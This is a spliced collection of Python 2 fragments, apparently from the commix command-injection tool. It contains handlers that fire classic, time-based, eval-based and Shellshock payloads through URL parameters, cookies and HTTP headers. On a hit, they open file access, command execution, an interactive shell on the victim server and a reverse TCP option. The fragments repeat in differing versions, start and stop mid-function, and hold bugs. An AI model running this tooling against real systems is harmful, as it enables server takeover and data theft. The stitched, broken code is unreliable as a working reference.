Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) # Check for any enumeration options. tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) # Check if defined single cmd. if menu.options.os_cmd: tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() continue elif cmd.lower() == "quit": logs.logs_notification(filename) sys.exit(0) elif cmd.lower() == "back": go_back = True break else: pass else: # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) if menu.options.verbose: print "" if output != "" and check_how_long != 0 : print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n" else: print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if menu.options.verbose: sys.stdout.write("\r(*) Continue testing the "+ technique +"... ") sys.stdout.flush() break else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Results-based Command Injection" technique = "classic injection technique" sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision( separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: if separator == " ": payload = re.sub(" ", "%20", payload) else: payload = re.sub(" ", whitespace, payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = cb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = cb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = cb_injector.referer_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test( payload, http_request_method, url) # Evaluate test results. shell = cb_injector.injection_test_results( response, TAG, randvcalc) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", re.sub("%2B", "+", payload)) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: if not menu.options.verbose: print "" cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: cb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input( "(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower( ) in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: # Command execution results. response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate injection results. shell = cb_injector.injection_results( response, TAG) if shell: shell = "".join( str(p) for p in shell) html_parser = HTMLParser.HTMLParser( ) shell = html_parser.unescape( shell) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if menu.options.verbose: print "" print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) header = {check_header : payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent )+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) if cve in response.info(): no_result = False print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. enumeration(url, cve, check_header) # File access options. file_access(url, cve, check_header) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" sys.exit(0) else: # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: shell = cmd_exec(url, cmd, cve, check_header) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL continue break else: continue except urllib2.HTTPError, err: print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response): percent = 0 counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Blind-based Command Injection" technique = "time-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL percent = str(percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): # Time relative false positive fixation. if len(TAG) == output_length: randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "(" + str(randv1) + "+" + str(randv2) + ")" # Check for false positive resutls output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell) if str(output) == str(randvcalc) and len(TAG) == output_length: if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break else: percent = str(float_percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: break # Yaw, got shellz! # Do some magic tricks! if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): if len(TAG) == output_length : found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: print "" tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) sys.exit(0) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() continue elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: # The main command injection exploitation. check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) print "" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def eb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "Results-based Command Injection" technique = "eval-based injection technique" sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES) for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 try: # Eval-based decision payload (check if host is vulnerable). payload = eb_payloads.decision(separator, TAG, randv1, randv2) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, urllib.quote(suffix)) payload = payload + "" + TAG + "" payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = eb_injector.cookie_injection_test(url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test(payload, http_request_method, url) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate test results. shell = eb_injector.injection_test_results(response, TAG, randvcalc) if not menu.options.verbose: percent = ((i*100)/total) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(percent)+"%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: http_request_method = "cookie" found_vuln_parameter = vuln_parameter else: if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL # Check for any enumeration options. eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter) # Check for any system file access options. eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter) # Check if defined single cmd. if menu.options.os_cmd: eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": logs.logs_notification(filename) sys.exit(0) elif cmd.lower() == "back": go_back = True break else: pass else: # The main command injection exploitation. response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Command execution results. shell = eb_injector.injection_results(response, TAG) if shell: shell = "".join(str(p) for p in shell).replace(" ", "", 1)[:-1] print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if menu.options.verbose: sys.stdout.write("\r(*) Continue testing the "+ technique +"... ") sys.stdout.flush() break else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
# Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input( "\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)" while True: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": # Delete previous shell (text) files (output) delete_previous_shell( separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) logs.logs_notification(filename) sys.exit(0) elif cmd.lower() == "back": go_back = True break else: pass
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique): # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input("\n" + settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "quit" or cmd.lower() == "back": print "" os._exit(0) elif cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif cmd.lower() == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0) elif gotshell in settings.CHOISE_NO: print "" os._exit(0) elif gotshell in settings.CHOISE_QUIT: print "" os._exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique): err_msg = "" if menu.enumeration_options(): err_msg += "enumeration" if menu.file_access_options(): if err_msg != "": err_msg = err_msg + " and " err_msg = err_msg + "file-access" if err_msg != "": warn_msg = "The " + err_msg + " options are not supported " warn_msg += "by this module because of the structure of the exfiltrated data. " warn_msg += "Please try using any unix-like commands manually." print settings.print_warning_msg(warn_msg) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break question_msg = "Do you want a Pseudo-Terminal shell? [Y/n/q] > " gotshell = raw_input("\n" + settings.print_info_msg(info_msg)).lower() if gotshell in settings.CHOICE_YES: print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "quit" or cmd.lower() == "back": print "" os._exit(0) elif cmd.lower() == "?": menu.shell_options() elif cmd.lower() == 